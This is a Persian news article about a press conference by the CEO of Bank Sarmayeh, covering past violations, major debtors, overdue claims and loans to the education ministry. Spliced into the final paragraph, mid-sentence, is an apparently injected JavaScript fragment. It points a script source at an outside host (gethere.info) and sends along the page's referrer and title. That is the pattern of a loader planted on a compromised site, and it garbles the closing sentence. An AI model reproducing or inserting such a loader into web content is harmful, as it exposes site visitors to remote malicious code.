شفاف سازی مدیرعامل بانک سرمایه در جمع خبرنگاران

مدیرعامل بانک سرمایه در جمع خبرنگاران با اشاره به جذب ۶۴ درصدی منابع توسط این بانک گفت: این مطلب بیانگر اعتماد مشتریان به بانک سرمایه است، هرچند که منکر تخلفاتی که در این بانک در ادوار گذشته صورت گرفته نمی شویم.
به گزارش سادس به نقل از خبرهای بانکی،محمدرضا خانی با تاکید بر اینکه تخلفاتی که در بانک سرمایه صورت گرفته بود با همکاری های عامدانه بدهکاران کلان و برخی از کارمندان بازنشسته سایر بانک ها بوده، افزود: نکته حائز اهمیت این است که توسط نیروهای جوان تخلفی صورت نگرفته است. ما نقطه ضعف را شناسایی کرده و عذر تمام بازنشستگان را خواستیم و کار را به نیروهای جوان تحویل دادیم.

وی در ادامه افزود: مذاکرات با بدهکاران کلان بانک که ۳۱ نفر هستند آغاز شده و ما اقداماتی را از لحاظ کیفری و حقوقی انجام داده ایم. بزرگترین بدهکار بانک سرمایه م.ج با رقم ۱۲۰۰ میلیارد تومان بدهی است.
مدیرعامل بانک سرمایه با تأکید براینکه هیچ گونه ادغامی در خصوص بانک سرمایه اتفاق نخواهد افتاد، گفت” در نظام بانکی عملکرد ما به گونه ای است که در چهار شاخص اصلی جزء برترین ها هستیم. از ابتدای سال ۹۵ تاکنون، ۶۴ درصد افزایش منابع داشتیم و با وجود اینکه یکی از بدهکارترین بانک ها بوده ایم توانستیم ۹۷ درصد بدهی بین بانکی خود را تسویه کنیم و هم اکنون هیچ گونه بدهی ای به بانک مرکزی نداریم. همچنین سپرده قانونی بانک نزد بانک مرکزی را ۷۱ درصد افزایش داده ایم. در حال حاضر کل مطالبات معوق بانک سرمایه ۷۸۰۰ میلیارد تومان است که ۲۰۰۰ میلیارد تومان آن جریمه تأخیر است و با توجه به اینکه از ابتدای سال کمیته ای جهت وصول مطالبات ایجاد کرده ایم این رقم کاهشی خواهد شد و سعی خواهیم کرد تا پایان خرداد سال آینده بالای ۷۰ درصد مطالبات را وصول کنیم.
وی افزود: در ابتدای سال ۴۵۰۰ میلیارد تومان وام به آموزش و پرورش پرداخت کردیم که صرف حقوق معوق بازنشستگان شد. همچنین یک ماه پیش ۵۰ میلیارد تومان دیگر جهت پرداخت حقوق معلمان پرداخت شد. در نظر داریم خط اعتباری ای را نیز برای این مهم اختصاص دهیم. هم اکنون هزینه تبلیغات بانک را صرف دانش آموزان مدارس محروم کرده ایم. این دانش آموزان یا به مجموعه معرفی شده اند و یا خودمان آن ها را شناسایی کرده ایم. علاوه براین دانش آموزانی که بنابر فقر مالی ترک تحصیل کرده بودند تحت پوشش این بانک قرار گرفته و به تحصیل خود ادامه خواهند دادs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *